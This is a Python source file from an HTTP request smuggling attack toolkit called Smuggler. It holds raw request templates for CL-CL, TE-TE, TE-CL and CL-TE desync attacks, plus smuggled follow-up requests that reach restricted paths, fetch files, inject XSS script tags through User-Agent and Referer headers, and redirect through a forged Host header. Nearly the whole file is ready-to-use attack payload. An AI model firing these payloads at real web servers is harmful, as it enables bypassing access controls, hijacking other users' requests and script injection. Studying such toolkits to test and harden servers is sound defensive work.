payloads.py 5.1 KB

123456789101112131415161718192021222324252627282930313233343536373839404142
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020/2022 - by psy (epsylon@riseup.net)
  5. You should have received a copy of the GNU General Public License along
  6. with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
  7. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  8. """
  9. payloads={
  10. 'CL-CL-0#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\n\r\nY',
  11. 'CL-CL-1#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 1\r\n\r\nY',
  12. 'CL-CL-2#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 3\r\n\r\nY',
  13. 'TE-TE-0#Content-Type: application/x-www-form-urlencoded\r\nContent-length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
  14. 'TE-TE-1#Content-Type: application/x-www-form-urlencoded\r\nContent-length: 4\r\nTransfer-Encoding: identity, cow\r\nTransfer-encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
  15. 'TE-TE-2#Content-Type: application/x-www-form-urlencoded\r\nContent-length: 4\r\nTransfer-Encoding: chunked\r\nTransfer-encoding: identity, cow\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
  16. 'TE-CL-0#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
  17. 'TE-CL-1#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 3\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
  18. 'CL-TE-0#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nY',
  19. 'CL-TE-1#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nY'
  20. }
  21. exploits={
  22. 'CL-CL-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
  23. 'CL-CL-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: $LC\r\n\r\n$SMUGGLED',
  24. 'CL-CL-2#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: $LC\r\n\r\n$SMUGGLED',
  25. 'TE-TE-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-length: $CL\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\n$SMUGGLEDPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
  26. 'TE-TE-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-length: $CL\r\nTransfer-Encoding: identity, cow\r\nTransfer-encoding: chunked\r\n\r\n5c\r\n$SMUGGLEDPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
  27. 'TE-TE-2#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-length: $CL\r\nTransfer-Encoding: chunked\r\nTransfer-encoding: identity, cow\r\n\r\n5c\r\n$SMUGGLEDPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
  28. 'TE-CL-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
  29. 'TE-CL-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
  30. 'CL-TE-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n$SMUGGLED',
  31. 'CL-TE-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n$SMUGGLED'
  32. }
  33. methods={
  34. '0#Y',
  35. '1#$method $path $protocol\r\nHost: $target\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\n\r\n$parameter=$SMUGGLED',
  36. '2#GET $restricted HTTP/1.1\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nFoo: Y',
  37. '3#GET $files HTTP/1.1\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL',
  38. "4#GET $path HTTP/1.1\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nUser-Agent: <script>alert('$text')</script>\r\nReferer: <script>alert('$text')</script>\r\nFoo: Y",
  39. "5#GET $PT HTTP/1.1\r\nHost: $redirect\r\n\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nFoo: Y\r\n\r\n"
  40. }